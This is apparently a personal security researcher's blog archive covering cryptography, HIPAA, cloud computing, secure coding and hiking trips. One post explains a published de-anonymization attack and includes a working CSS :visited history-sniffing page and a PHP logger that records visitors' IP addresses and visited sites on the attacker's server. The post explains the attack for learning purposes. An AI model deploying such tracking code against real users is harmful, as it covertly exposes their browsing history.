Nabeel's Blog

Security vs. Privacy

2012-02-19T02:40:00.002-05:00

Security or Privacy or Security and Privacy? IMO, contrary to the following figure, security along with privacy is possible; you don't have to loose privacy for security.

Provable Obfuscation

2011-11-09T17:08:00.005-05:00

An obfuscator O is a "compiler" that transforms your program P into a new program O(P) with the following properties [1]:
1. O(P) has the same functionality as P.
2. O(P) protects any secrets that may be stored inside and used by the program.

Provable obfuscation, if exists, can do wonders in the cryptography world. For example:
- Protection of algorithms and keys in software
- Controlled delegation of authority
- Fully homomorphic public-key encryption
- Digital watermarking
- Making interactive protocols non-interactive

Unfortunately the main provable obfuscation result is a negative one [2]. The following figure shows the security requirements of an obfuscated program O(P):
The obfuscated program should behave like a virtual black box; anything that can be computed from O(P) should be able to be computed by giving oracle access to the program P.

According to current results, it is impossible to achieve the above notion of provable obfuscation on arbitrary programs. So, what can we do best? There are two possible approaches:
1. Restrict ourselves to a weaker form of security
2. Restrict ourselves to special classes of programs (not arbitrary programs)

I prefer to have provable security for small classes of programs instead of having obfuscation techniques for many classes with weaker security. The only positive result that I am aware of is that a point function can be provably securely obfuscated under the random oracle model [1,3].

Here is an example of a point function:
if (input_password == stored_password) {
return true;
} else {
return false;
}

It takes as input the password and outputs true/false. More formally, a point function is a Boolean function that takes the value 1 (true) at exactly one point.

The following shows the common practice to hide password in a system:
if (hash(input_password) == stored_hash) {
return true;
} else {
return false;
}

You can think of the above program as an obfuscated point function where it returns true only if the stored hash value matches the hash of the input password. This can be viewed as a provably secure obfuscation of a point function under the random oracle model. Obfuscation hides the stored password as a hash value. (Hash function acts as a strong one way random permutation. An adversary can only make a dictionary attack to recover the stored password.)

Lynn et. al. [1] extends the above idea to construct provable obfuscation techniques to do more complex access control functionalities. Those who are interested in specific construction techniques are encouraged to read [1] and [3].

[1] Lynn et. al. Positive results and techniques for obfuscation, EUROCRYPT 2004
[2] Barak et. al. On the (im)possibility of obfuscating programs, CRYPTO 2001
[3] Wee, On obfuscating point functions, STOC 2005

Incremental Cryptography

2011-11-07T16:54:00.003-05:00

Let's assume that you have performed a transformation (e.g. hashing, signing, encrypting) to document M. The transformation is proportional to the size of M. Now a small part d of the original document changes resulting in M'. This change in the original document requires changing the transformed document. Are there techniques to perform the transformation that is proportional to the modified portion of the document (i.e. d) not M'? There is some interesting work done in this area. The idea was initially put forward by Ballare et. al. in 1994 and an improved version in 1995. There is some recent work on this area as well.

Trend: nosql

2011-10-27T09:15:00.002-04:00

What holds you from moving to the cloud?

2011-10-25T12:25:00.002-04:00

The following list of concerns are from 2008. Has it changed in 2011 or still the same??

What is the top use of cloud computing?

2011-10-25T12:08:00.005-04:00

Remote storage is the top use of cloud computing for small and medium businesses!

Reference: Source

Cost is the #1 barrier for cloud security

2011-10-25T09:34:00.005-04:00

Cost is the #1 barrier affecting customer deployment of new security solution:

Reference: Source

Secure programming tips - reduce attack surface

2011-10-06T11:00:00.003-04:00

The attack surface in software refers to the code an unauthenticated user can run. (What can an unauthenticated (malicious/untrusted) user do without having access to the system?)

For web forms,
- ALWAYS validate user inputs
- ALWAYS use the least possible privileged access to the resources (if a database connection only requires read only user, make sure that the web forms are connected to the database through a read only database user that read only from a specific database.)
- NEVER show exceptions on the browser as they may reveal useful information to an attacker to look for different attack vectors.

For any code,
- ALWAYS implement whitelisting approach (i.e. always give access based on the credentials users have)
- WEAR the "untrusted user" hat when writing code
- ONLY use libraries that are known to be secure
- THINK about the attack surface from the first line of code

If it is a service interface,
- Have the bare minimum number of functions (this will reduce the number of entry points for an untrusted user) - if a function is not going to be used by any user, just remove it.

Smart Meters and Privacy

2011-10-05T14:57:00.003-04:00

In case you haven't heard about smart meters, they are the next generation electric meters. Unlike the traditional electric meters, the provide two way communication. The goal of smart meters is to allow utility companies and consumers to better monitor the energy consumption and control electricity. Smart meters act as surveillance devices. Having such a surveillance device at your home could seriously invade your privacy though. It can be a security threat as well. Here are a couple of possible threats:
- It allows a third-party to see what equipments you are using, what time of the day, how long, how often, etc.
- An insurance company inferring what kind of medical problems you have based on the devices use and what time.
- A producer marketing products that go along with your equipments or suggest different equipments
- It gives information to a burglar to figure out a best time to break in. (Low consumption may be linked to empty house.)

The question is how much information utility companies need in order to better manage electricity while protecting the privacy? In other words, how can we balance the benefits of smart meters and the risks of using them?

Facebook and You

2011-09-23T03:23:00.001-04:00

(Source: http://www.eatliver.com/img/2011/7775.jpg)

HIPAA compliance

2011-05-28T22:07:00.005-04:00

Recently I have been reading a lot of HIPAA privacy/security related technical documents. HIPAA stands for Health Insurance Portability and Accountability Act and aims to protect Protected Healthcare Information (PHI) of US residents. These PHI records are held by insurers, health care clearing houses (e.g. billing services, health care information systems), health care providers, pharmacies, and so on. They are called "covered entities". So, covered entities have your sensitive PHI records. While HIPAA has many rules and regulations, I am particularly interested in HIPAA privacy and security specifications.

Before we go into "how", we first need to understand "what". Specifically,

What is PHI?
What is HIPAA privacy rule?
What is HIPAA security rule?
What does it mean to be HIPAA compliant (only the technical part)?

PHI is any health care related information (health status, medication, payments, etc.) that is held by covered entities that can be linked to an individual user.

HIPAA privacy rules consist of a set of regulations that control the use and disclosure of PHI records held by covered entities. For example, upon request, covered entities should disclose PHI to the individual. Another example, covered entities should inform individuals the use of their PHI records. Recently I had to take an x-ray; the x-ray was transferred electronically between two hospitals (from the one I took it to another hospital that I consulted a doctor). During that process I didn't get to see my x-ray, nor I was aware that it was transferred to the second hospital until I was told by the doctor I consulted that he had a look at my x-ray. To me this is a violation of HIPAA privacy rules as I was not informed beforehand by the first hospital about the use of my x-ray (i.e. PHI record).

HIPAA security rules specify a set of security standards along with either required or addressable specifications. It is primarily concerned with electronic PHI (ePHI) records. For example, it is required to implement auditing and it is an addressable to implement integrity controls. When a safeguard is "required", it should be implemented as specified by the HIPAA security rules, whereas when a safeguard is "addressable", it provide the flexibility to the covered entity to implement the safeguard as deemed appropriate. Note that it is a difficult thing to quantify how much security is required to implement a addressable security rule. Further, it is questionable how one can verify if the implementation of an addressable security safeguard complies with HIPAA rules.

HIPAA security rules are divided into three categories:
1. Administrative safeguards
2. Physical safeguards
3. Technical safeguards

(Source)

We will focus only on the technical safeguards. In order to be technically HIPAA security compliant, a covered entity should implement all the required safeguards as specified and all the addressable safeguards as deemed appropriate.

Required safeguards:
- Access control
- Unique user identification
- Emergency access procedures
- Audit control
- Person/Entity authentication

Addressable safeguards:
- Access control
- Automatic logoff
- Encryption/decryption
- Integrity (incorrect modifications by authorized users)
-Transmission security
- Integrity controls (unauthorized modif
- Encryption

So, according to the above safeguards, do we need to encrypt PHIs in a closed system which does not travel through an open network? In theory, HIPAA does not specify to. But what about preventing unauthorized access to PHIs? For example, even in a close system, there are individual who should not see PHI records. For example, a database administrator should not see the PHIs stored. Therefore, it is safe to keep the PHI records in encrypted form even in the database (data at rest). Note that data in motion through open networks must be encrypted always to prevent unauthorized access to the PHI records by eavesdroppers.

Having audit controls in place is a required requirement of the technical safeguards. However, HIPAA rules do not specify what or how often should be audited. These are important decisions a covered entity should make based on the risk analysis.

Main References:
http://www.hipaaacademy.net/consulting/hipaaSecurityRuleOverview.html
http://www.hhs.gov/ocr/privacy/hipaa/administrative/securityrule/techsafeguards.pdf

Running Java from Firefox using the add-on

2011-05-02T18:05:00.002-04:00

I wanted to run a Java applet from Firefox. I was using Firefox on Ubuntu. I am using Open JDK 6. You need libnpjp2.so browser plug-in for that. However, Open JDK does not have this plug-in. So, had to install Sun Java plug-in:

sudo apt-get install sun-java6-plugin

Then you need to go to the firefox plug-in directory and make a hard link to the libnpjp2.so library. (You need to close firefox before making the hard link)

cd /usr/lib/firefox/plugins
ln -s /usr/lib/jvm/java-6-sun-1.6.0.22/jre/lib/i386/libnpjp2.so .

You will see the plug-in listed in Tools > Add-ons > Plugins tab. You can enable or disable any time. (QuickJava Firefox extension provide a nice little tool to enable/disable on the fly.)

Hope that helps.

De-anonymizing social network users

2011-04-27T13:26:00.003-04:00

Recently read an interesting paper about de-anaonymizing social network users that appeared in last year's S&P. The idea is quite simple: the groups a user belongs act as a fingerprint of the user (aka group fingerprint of a user); in other words, the set of group a user belongs allows to identify a user uniquely. Most of the social networks provide the ability to be (or not to be) a member of groups. If an attacker can get hold of the group membership information of a user from these social networks, then it can uniquely identify the user (e.g. associate an IP address with a specific user). How to steal the group membership information? They use another simple technique to do this; use an existing technique to steal user browser history.

I initially thought you've got to have javascript enabled in order to steal user browser history (you are still not safe even if you disable javascript!). I was curious to find out how to do without javascripts. You can do a simple CSS trick to steal the browser history (an online example). The idea is quite simple. In your style sheet, you specify which URL's you want to track. Then you use some kind of a social engineering trick for the user to open your malicious page. For the user there is nothing visible, it is an innocuous html page; but it simply checks browser history and if the user had happened to have visited some of the links listed in the page, it sends a message back to the malicious server. Then the malicious server knows which links user visited.

For example,
This is a simple malicious page html page that I want to get a user to open:


<html>
<body>
<style>
span.s1 a:visited {
background:url(visited.php?t=http%3A//http.google.com);
}
span.s2 a:visited {
background:url(visited.php?t=http%3A//http.dailymirror.lk);
}
</style>

<span class="s1">
<a href="http://www.google.com">www.google.com</a>
</span>
<br/>
<span class="s2">
<a href="http://www.dailymirror.lk">www.dailymirror.lk</a>
</span>
</body>
</html>

And I have a small malicious php file which write to a txt if the user has visited a specific link:

<?php
$client = $_SERVER['REMOTE_ADDR'];

$fp = fopen("history.txt", "a");
$str = $client . " has accessed " . $_GET['t'] . "\n";
fwrite($fp, $str);
fclose($fp);
?>

The history.txt file has something like:
205.10.1.1 has accessed http://www.google.com
210.34.5.11 has accessed http://www.google.com
210.34.5.11 has accessed http://www.dailymirror.lk

You get the idea. It is quite simple to launch this attack.

Found that this plug-in from Stanford said to protect your browser from visited link based attacks. (Update: this plug-in is no longer maintained. Only has an xpi for FF 2.0)

Grid vs. Cloud computing

2011-04-15T15:34:00.004-04:00

In today's group meeting, we were discussing the security issues in the cloud computing paradigm. At the end of the meeting, I was confused about the difference between grid vs. cloud computing. Are they both refer to the same thing? Or Are they different? Or Are they have things in common? If it is the last case, what is common and what is different? So, I decided to look for the answer.

I am not familiar with grid computing, but Ian Foster et.al.'s 2008 paper titled "Cloud computing and grid computing 360-degree compared" helped to resolve some of the confusions I had in mind. This blog post is based on the material in that paper.

The following diagram shows the big picture of grid vs. cloud computing.

The following discussion is based on projects such as TeraGrid (grid computing) vs. commercially available Amazon EC2, Microsoft Azure (cloud computing).

How the resources are distributed?
To me both are the same from the distributed system point of view; both try to reduce the computing cost by using distributed cluster of computers. However, the main difference appear to be how the two approaches work. It is safe to say that, from a user's point of view, cloud computing is a centralized model whereas grid computing is a decentralized model where the computation could occur over many administrative domains.

Who controls?
In cloud computing (at least from what I have seen so far), one party has the control over the cluster of computers, whereas in grid computing, there is no one controller that can control all the nodes in the cluster. In other words, cloud computing allows a user/organization to build a virtual organization on a third party infrastructure where as grid computing tries to build a collaborative virtual organization that does not belong to one single entity.

How the on demand computation works?
Both have the notion of on demand computation. However, grid computing is more of an incentive model (e.g. if you provide computation resources, you also get computation resources from others who have already joined the grid/cluster), whereas in cloud computing there is no notion of incentive model. Cloud computing is more of a utility model like electricity consumption where you pay for what you use. One could argue that both have some kind of a utility model; in grid computing you trade your idle computation cycles, unused space, etc. with some other (same or different) resources available in the virtual network and in cloud computing, you trade your money for the resources available with a cloud provider.

I don't claim that the above description is fully correct. I may have looked at the topic from a narrow point of view. Please feel free to voice your opinion.

Starting a sub sandwitch business applying MapReduce :)

2011-03-23T20:11:00.006-04:00

Here's the simplified process:

Input map to the mapper:
item1 -> bread, item2 -> cucumber, item3 -> green pepper, item4 -> tomato, item5 -> lettuce, item6 -> onion

Output map of the mapper:
item1 -> sliced bread, , item2 -> sliced cucumber, item3 -> chopped green pepper, item4 -> sliced tomato, item5 -> chopped lettuce, item6 -> sliced onion

Output map of the reducer:
vegi subs

That's the start-up. It is self-explanatory to see how easy it is to parallelize these tasks and make subs quickly on the fly. As the business grows, adding different varieties of breads, toppings, meats, etc. is quite easy too.

Wish list of search over encrypted data

2011-03-08T13:39:00.004-05:00

The encrypted data is hosted in an untrusted server (honest-but-curious case only) and a user wants to make a "special" query and obtain only the matching data objects. I use the word "special" since you need to have some kind of an encoded query in order for the server to execute it over encrypted data without decrypting the data.

My wish list: The server should not be able to
- learn what the "special" query is
- create the "special" query by itself
- distinguish between encrypted data objects
- learn the result of the "special" query

Proxy re-encryption

2011-03-02T10:47:00.004-05:00

Alice wants to allow Bob to decrypt messages encrypted under her public key, but Alice does not want to give her private key to Bob. How can Alice do this? One way is to use the help of a proxy. Alice would not want to give her private key to the proxy either, since it requires an unrealistic amount of trust. What Alice wants is a way for a proxy to convert the messages encrypted under her public key to messages encrypted under Bob's public without the proxy decrypting Alice's messages. This is where Alice can use proxy re-encryption. Alice gives some information to the proxy so that it can covert the messages. Alice is the delegator and Bob is the delegatee.

An example would be Alice wants to temporarily forward her emails encrypted under her public key to Bob. So, she forwards her encrypted emails to a proxy and gets it to covert her encrypted emails to the ones encrypted under Bob's public key so that Bob can decrypt and read the emails.

Some of the security properties demonstrated by existing proxy re-encryption schemes:
1. The proxy cannot see the plaintext unless it colludes with Bob.
2. The proxy cannot derive the secret key of Alice (even when the proxy colludes with Bob).
3. The scheme could be bi-directional (When Alice delegates to Bob, automatically Bob delegates to Alice. So, Alice and Bob need to have mutual trust for such schemes to work) or uni-directional (Alice can delegate to Bob without Bob having to delegate to her. Thus, the trust relationship between Alice and Bob does not need to be mutual).
4. The scheme could be transitive (Alice can delegate to Bob, and Bob can delegate to Tim in turn for example.) or non-transitive (Bob cannot delegate to Tim).

Encryption in the cloud

2011-02-22T09:42:00.004-05:00

Good read on the $subject

There are solutions for data-at-rest, but they are far from perfect for cloud scenarios. In my opinion, the most challenging one is the data-in-process. There are some basic solutions to perform computation over encrypted data, but they are quite limited. This is mainly due to the fact that we still don't have efficient fully homomorphic encryption schemes. I think in the next decade, we will see better techniques to perform computation over encrypted data without decrypting them.

Homomorphism in Shamir's secret sharing

2011-02-21T16:46:00.005-05:00

The homomorphism property in the Shamir's secret sharing scheme is a simple but a very powerful idea that could be useful to reduce the trust we have to put on the dealer to correctly distribute secret shares to users. (See my previous post for an introduction on verifiable secret sharing).

Let's look a simple example to see what this property means.

Assume that we have two degree two polynomials g and f which we can use to create two 3-out-of-n secret sharing schemes where at least 3 out of n users should get together to obtain the secret.

f(x) = 2 + x + x²
g(x) = 3 + 2x + 3x²

We have three users with the following secret shares given from the two secret sharing polynomials where the secrets are 2 and 3 for f and g respectively. Let's call them sub-secrets.

User	f	g
u₁	(1,4)	(1,8)
u₂	(2,8)	(2,19)
u₃	(3,14)	(1,36)

Let's call the combination of the two sub-secrets as the super-secret, which is equal to 5. The problem we have at hand is "how can the users construct the super-secret revealing as little information about the sub-secrets as possible?".

It is not difficult to see that if the three users releases the sum of their secret shares, that is (1, 12), (2, 27) and (3, 50), and do the polynomial interpolation on in it, the combined function gives the super-secret 5. So, the sum of the shares of the secrets are the shares of the sum of the secrets. This is what the homomorphism property is.

The above relationship is defined as the (+, +)-homomorphism. It could be two different operators. For example, Shamir's secret sharing scheme can be converted to (*, +)-homomorphism by using discrete log of secret shares.

References:
Josh Cohen Benaloh, Secret Sharing Homomorphisms: Keeping Shares of a Secret, Proceedings on Advances in cryptology---CRYPTO, 1986

A simple construction of a veribable secret sharing scheme

2011-02-18T15:36:00.007-05:00

In a SS (Secret Sharing) scheme a secret is split among many people and some of them need to corporate to build the secret from their shares of the secret. In in it is basic form, a dealer who possesses the secret s splits the secret and gives the secret share s_i to each party P_i, i = 1, 2, ..., n. The protocol makes sure that there should be at least t+1 parties to derive the master secret s. In other words, t or less number of parties cannot derive the secret.

In a normal SS scheme, the dealer is assumed to be honest. What if the dealer can be malicious? That's where VSS (Verifiable Secret Sharing) comes to play. VSS is similar to SS except that it allows each party to verify that the share given to them, s_i, is a valid one.

Here's a simple VSS scheme using Shamir's secret sharing and additive homomorphic encryption.

An additive homomorphic encryption scheme (e.g. ElGamal cryptosystem) allows us to perform addition over encrypted data. In particular, we use the following properties. Let E be the encryption algorithm and m₁, m₂ two numbers.

E(m₁)E(m₂) = E(m₁ + m₂)
E(m₁)^m₂ = E(m₁m₂)

The dealer generates secret shares just like in the Shamir's SS scheme. For (n, t+1) (i.e. out of n parties, there should be at least t + 1 parties to construct the secret, the dealer selects a random degree t polynomial f with f(0) = s:

f(x) = s + a₁x + a₂x² + ... + a_tx^t

The dealer sends the secret share (i, f(i)) (f(i) = s_i) to each party P_i through a private communication channel. Now t + 1 parties can perform a polynomial interpolation and obtain a unique polynomial which is equal to f and get the secret f(o).

In order to verify their secret shares, the dealer distribute an additional piece of information. The dealer generates public and private key pair for the additive homomorphic encryption E and broadcasts the encrypted coefficients of f, that is, E(s), E(a₁), E(a₂), ..., E(a_t). A party P_i, first encrypts it share and compare if the following holds. If it is true, it concludes that the dealer has given a valid secret share.

E(s_i) ==? E(s)E(a₁)ⁱE(a₂)^i² ... E(a_t)^{i^t}References:
How to Share a Secret, 1979, Adi Shamir
A Practical Scheme for Non-interactive Verifiable Secret Sharing, 1987, Paul Feldman

Flat table based group key management

2011-02-15T18:07:00.002-05:00

Flat table (FT) key management is a simple way to manage group key. In it is basic form, it is quite efficient, but it is susceptible to collusion attacks.

First the notations:
GC - Group Controller - the centralized entity that manages the group key
GM - Group Member - a participant who wants to obtains the group key
K - the group key, it is also called DEK (Data Encryption Key) and is used to encrypt broadcast messages to the group.
KEK - Key Encryption Key - a key used to encrypt K.

Each GM in the group is assiged an identifier, ID. ID is an n-bit binary number which is denoted as X_n-1X_n-2...X₀, where X_i is either 0 or 1. The maximum size of the group N = 2ⁿ.

GC maintains 2n KEKs, {k_i,b | i ∈ Z_n, b ∈ Z₂}. That is for each bit position, there are two keys, one for 0 and one for 1.

Each GM is given n + 1 keys. Half of the KEKs (i.e. n) which correspond to the n bits in its ID and K.

Join:
Let's assume that the ID of the joing GM is X_n-1X_n-2...X₀. In order to provide backward secrecy (i.e. not allow the joining GM to access previous keys), we need to update K and n KEKs {k_{i,X_i} | i ∈ Z_n} corresponding to this ID. New K and KEKs are encrtypted with their old K and KEKs respectively and broadcast to the group. GC gives the new K and KEKs to the joining GC though a secure private communication channel.

Leave:
Let's assume that the ID of the leaving GM is X_n-1X_n-2...X₀. In order to provide to provide forward secrecy (i.e. not allowing the leaving GM to access new keys), again K and the n KEKs held by the leaving GM are updated.
However, we need to use a different approach to update the keys since we cannot reuse the old keys to do the job. GC decides a new group key K' and encrypts with the remaining n keys that the leaving GM does not possess and broadcasts the encrypted messages. An existing group member can decrypt at least one of those messages and obtain the new group key K'. Then GC encrypts each new KEK corresponding to those of the leaving GM twice. First GC encrypts with K' and then encrypts with the old KEK, and then broadcast to the group. It make sure only the existing users can access new KEKs who already had old KEKs. Notice that the leaving GM cannot access since it does not have K' to remove one layer of encryption.

There are proposals for optimizing for multiple leaves. In one work, the use Boolean function minimization techniques to reduce the complexity.

Collusion attacks:
When multiple users are removed at once, the FT key management approach is not resistant to collusion attacks.

References:
Waldvogel et. al. The VersaKey framework: versatile group key management, 1999

Chang et. al. Key management for secure internet multicast using Boolean function minimization techniques, INFOCOM 1999

What should we have in a security definition/protocol?

2011-02-09T15:16:00.004-05:00

There are three key components that should be specified in any security definition/protocol.

1. Adversarial power under which the protocol is secure
2. Network model in which the protocol operates
3. Security guarantees that the protocol provides

Security is not something absolute. We may not be able to protect a protocol against any type of adversary. A security protocol is meaningless if it does not specify the capabilities of the adversaries under which the protocol is still secure. The capabilities of adversaries are specified in the adversarial model. For example, if the adversary is computationally bounded or have unbounded computational power, if the adversary is honest, semi-honest or malicious, etc.

Your protocol may need a trusted third party to work. It may not be secure without a trusted third party. Your protocols may need certain parties to online at all times. Such information is specified in the network model. Like the adversarial power, your protocol is meaningless without a proper network model.

As I mentioned earlier, security is moving line; your protocol may solve only certain problems. It is crucial to specify what problems it solves up front as part of the security guarantees.

In short, you need to specify what security guarantees your security protocol provides under which adversarial and network model. Otherwise, a security protocol is as useless as zero security protocol.

A big mistake people, especially in the database community, make is to say "our protocol is secure for this data set and it does not reveal any useful information to the adversary". This is very wrong. You cannot define security based on a input data set. What happens when you have a different data set? Will your protocol still be secure? Probably not. Security should never be analyzed by a set of examples. Rather, it should be based on the above 3 objective measures.

Broadcast encryption vs. DRM

2011-01-28T09:55:00.005-05:00

In the last post, I started looking into the problem of broadcast encryption (BE). In this short post, I am comparing the BE problem with DRM (Digital Rights Management) problem.

BE and DRM has the common goal of preventing unauthorized users from accessing the content. However, IMO, DRM is more challenging since the adversary could be a privileged user. A privileged user who has legitimate access could decide to copy or convert the content into a different format and share it with non-privileged users. Hence, DRM requires additional mechanisms to prevent copying or conversion or at least mechanism to identify a traitor if DRM is violated.

Broadcast encryption

2011-01-21T11:39:00.005-05:00

Broadcast encryption (BE) deals with encryption schemes designed for broadcast transmission systems such as pay-TV systems, content dissemination in an organization, the distribution of copyright protected material on disks, audio/video streaming systems and so on. The goal is to allow only an arbitrary subset of users (sometimes called privileged users) from the universe of users to access the content while minimizing key management overheads. In this series of blog post, I will be looking into how this field of BE evolved from research point of view, the current state of the art schemes available to address this research problem and future directions.

(Figure: broadcast encryption)

In a high level, BE works as follows: Each user in the universe is given a set of symmetric keys initially. A set of messages are sent to establish a common key among the set of privileged users so that only the privileged users can decrypt the broadcast messages using the common key.

Naive approach 1
Each user is given a unique symmetric key.
When a privileged set needs to be establish, the controller selects a group key K and encrypts number of times equal to the size of the privilege set using the symmetric keys of the privileged set and sends to the users.
Subsequent broadcast messages are encrypted with the key K.

It works but it requires a very long transmission to establish the common key (number of users in the privileged set into the size of the message).

Naive approach 2
Each possible subset of users is assigned a unique symmetric key.
When broadcasting a message, encrypt it with the correct symmetric key corresponding to the privileged set.

It also works, but users need to store prohibitively many keys and revocation is also difficult.

It should be clear that BE is an optimization problem which tries to optimize the following parameters.
1. The number of keys given to each user.
2. The number of transmissions used by the controller to establish the common key.
3. The computation effort involved in retrieving the common key by the users of the privileged set.

References:
1. Broadcast encryption, Amos Fait and Moni Naor, 1998

Thinking security geometrically

2010-12-12T15:13:00.005-05:00

Recently, I had an interesting conversation where the discussion diverged into the application of geometry in security protocols. Until then, I didn't pay much attention to how we derive security protocols. Actually, most of the time we think about security constructs from the algebraic point of view. We hardly think in terms of geometric shapes. At that time, I couldn't think of a security protocol whose basis is geometry. So, did some research on the topic. Here's one example: one of the very first secret sharing scheme, Blakley's scheme, is based on the really cool idea of intersection of (hyper)planes. The idea is quite simple. Any non-parallel n n-dimensional hyperplanes intersect at a unique point and that unique point corresponds to the master secret and the n hyperplanes correspond to the secret shares. For example, two non-parallel lines on the same plane intersect at a specific point; two non-parallel planes in the space intersect a specific point. Even the idea behind Shamir's secret sharing scheme could be considered as a geometric construction.

(Source: wikipedia)

In the above diagram, each plane represents a secret share and the intersection point represents the master secret.

GWT

2010-10-18T09:32:00.002-04:00

I have been doing a lot of AJAX based programming lately..thanks to Google Web Toolkit I don't need to worry about underlying AJAX calls; it works seamlessly..however, I had some issues with layouts and laying out widgets..GWT (2.0) works well when you set explicit height and width for widgets but acts weirdly when you want to set a variable (percentage value) especially in the standard mode. After a lot of trail-and-error, I changed most of my outer layout panels to FlowPanels to get the scalable width working.

Where do good ideas come from?

2010-09-21T17:13:00.002-04:00

The key message from Steven is that ideas come from collaboration. Collaborations/discussions do create Eureka moments, but IMO a good amount of time spent alone can also create Eureka moments..I think the key is the passion to connect the dots.

Research and camera lenses

2010-07-10T13:29:00.003-04:00

There is a resemblance between the way we do research and the camera lenses. I am just trying to tie them together :)

Macro lens - Go deep into the details
Telephoto lens - Foresee the trends that drive the technology and demand new technology/solutions
Wide angle lens - Get the big picture
Prime lens - Focus on a topic

Where to go to Friday Jummah prayers in Menlo Park?

2010-07-10T09:30:00.004-04:00

As I am working in Menlo park during this summer, I had to find a new place to go to Friday Jummah (congregational) prayers. Menlo park itself does not have a mosque and there are hardly any Muslims around the area. Fortunately, I found two options which worked out for me. I take 2 - 3 hours off every Friday to make it to the prayers. It's good to get away from the busy life for at least a few hours and be with the community every week.

Option1:
Islamic Society of Stanford University holds a Friday prayer starting at 12.15 pm (till 1.10 pm). This one is the closest to Menlo park (about 2 miles away). It is managed by the students at Stanford. Stanford does not have a mosque though. (Good thing about Purdue, where I study, is that it has a mosque in the campus itself and there is a large Muslim crowd.) They hold the Friday prayers in the 3rd floor of the old Union building (However, they do have special wudu areas). You get about 50-60 people altogether. Where to park your car? There is a paid parking lot at the intersection of Mayfield avenue and Lagunita drive. You can either use your credit card or use coins to pay. During May/June (where the Spring semester was still in progress), it was somewhat difficult to find a parking spot in that car park (You better go there about 1/2 an hour early). But now, being the summer, there is ample parking available in that lot.

Option2:
Muslim Community Association (MCA) mosque in Santa Clara (Yelp). It's about 15 miles (1/2 an drive) from Menlo park, but I very much like this place - it's a quite big mosque with a large gathering. If I have more time, I usually drive to this place instead of Stanford. They have two Jummah prayers one at 12.15 pm (I usually go to this one) and the other at 1.30 pm. In addition to the large prayer areas, the mosque has many other specialized rooms. Talking about parking, it does have a big parking lot, but it gets filled pretty quickly on Fridays - so you better go there a few minutes before if you want to park in the mosque itself. There is also a parking lot close to the mosque which you can use.

Other useful links:
South Bay Islamic Association
Muslim Community Association

Hope this information might be useful to those who are new to this area.

[Security/Privacy] Can we bridge the gap?

2010-07-07T20:41:00.003-04:00

I was wondering how we may apply secure computing (e.g. computation over encrypted data) in real life scenarios where you have to interact with real objects as opposed to bits and bytes. It seems to me quite difficult, if not impossible, to achieve the same "invisibility" in the physical world; the very nature of the tangibility makes it hard to do so.

Consider the example where I want to mail my digital photos to Walgreens and get them printed. However, I want Walgreens to see neither the photos nor the printed copies. You see the similar privacy/security problems in getting something printed through a courier service such as UPS. I am not aware of any technology that we could use to solve this problem. One important thing is for the solution to be economical for me (the service requester), the amount of work I need to do (hence the cost) to recover the actual thing (actual photos from printed copies) should be cheaper than the service I want (getting the photos printed) in the long run. Otherwise, I might as well buy my own printing machine and do the printing myself which will eliminate the problem of privacy/security.

Driving/Hiking in the Big Basin Redwoods park

2010-07-06T10:25:00.004-04:00

For the memorial day long weekend, I drove to the Big Basin Redwoods state park. The drive around the park area was really nice as it is covered with big redwood trees. I spotted a few deer as well. The road is very curvy and narrow; at times you have only one lane - so you have to be careful when driving and enjoying the view around you.

I parked the car in the park headquarters ($10 for parking, $5 for the map) and hiked about 10 miles. It was a good workout for me and the trails are spectacular and covered with large trees and a water stream flowing close by. Make sure to take the trail Skyline-To-The Sea Trail to Berry Creek Falls to Sunset Trail if you want to see the beautiful waterfall. The total round-trip distance is about 10 miles. You'll need 6 to 8 hours to cover this particular route and enjoy the surrounding.

It was a little hot and humid on that day. You better take a big bottle of water with you as you get dehydrated quickly there.

Driving/Hiking around the Golden Gate Bridge

2010-07-06T10:23:00.003-04:00

I recently visited the golden gate bridge and stopped at both north and south sides. One of the main stops in the north side is the vista point which you find it immediately to the right after you cross the bridge from the south. You get a good view of the bridge from there. You'll also find the statue of the lonely traveler and a distant view of the Alcatraz prison island. The parking lot is somewhat small and you might have to wait a little bit to find a parking spot. There is also a side walk along the bridge.

From the side, you can drive/hike along the beach. We drove along Marina Blvd and Manson St (North East) and Lincoln Blvd (North West). If you want to take photos, it is better you go there in the morning or late in the afternoon close to sunset. In the afternoon, the sun directly falls on the bridge and it is hard to take any good photos.

'The law of fishes'

2010-06-30T21:30:00.003-04:00

This is what is happening everywhere!

Impact of a tweet

2010-06-30T01:26:00.007-04:00

I was just thinking about whether we can come up with a formula to measure the impact of a tweet just like we measure acceleration (v = u + at), force (f = ma), etc. in high-school Physics :-)

The following looks to hold:

impact ∝ ((rate of tweeting) * (quality of the tweets) * (number of followers) * (average frequency of checking tweets by followers)) / ((avg. number of people your followers follow) * (avg. rate of tweets your followers see))

It is not so simple as I initially thought; Number of retweets, the @ tags or # tags also can have a very positive effect. And, rate of tweeting could have a negatively effect as well - for example, if you are a fast tweeter people may simply ignore your tweets as junks. Quality is also a very subjective term. Also the relationships could well be nonlinear.

Another thing I was thinking about was how the rate at which information reaches us has evolved over time. 10 years ago, we used to rely mainly on the morning news paper, but now within minutes we have access to tweets and blogs to get our hands on the latest. So, how much is the acceleration of information? Roughly speaking, the acceleration ∝ (a day - a few minutes) / 10 years. The velocity at which information reaches us keeps on rising - I feel like the current velocity is already higher than our brain can 'run' - we are overloaded! We will need to add some 'friction' to slow it down :-)

[Hiking] Muir Woods National Monument

2010-06-20T07:53:00.005-04:00

I along with a friend drove from Palo Alto to Muir Woods which is located 11 miles from the Golden Gate bridge. The designated parking lot is quite small and we were not able to park there. (We reached there around 10 am) But there is plenty of road side parking if you drive a few minutes pass the parking lot.

Muir Woods has over 6 miles of hiking trails (pay just $1 and get the hiking map - it's very useful if you are not a frequent hiker in Muir Woods). It was one of the best hiking I have ever done - you get to walk along giant red wood trees with voices of nature, the less hiked trails give this clam and peaceful feeling to you. I would definitely go back again there when I get a chance. It is not an exaggeration to say that you sometimes get the Pandora feeling in the Avatar movie.

The temperature was around 60-70 F. I took my jacket with me in case it is cold inside the wood, but I did not have to use it. Make sure you take a bottle of water with you if you plan to do a longer trail - we hiked for about 3 hours - but you need a full day or more to cover all the trails.

Talking about the trails, there is one main trail which is flat and even wheel-chair accessible; most people walk along this - so it is somewhat crowded. Other trails are either longer or with some rough paths and slopes (medium to difficult). They are not hiked by many people and you get to experience a calm and peaceful environment. We hiked along Fern creek trail, Camp East Wood trail and Hill Side trail - all I would say are of easy to medium difficulty. Most of the time we were hiking along a path with a small water stream flowing next to the trail. There are several other longer trails which we did not have time to cover - Lost trail, Ocean view trail, Redwood trail and Coastal view trail are some of them.

If you are visiting the bay area and a nature lover, I would definitely recommend this place.

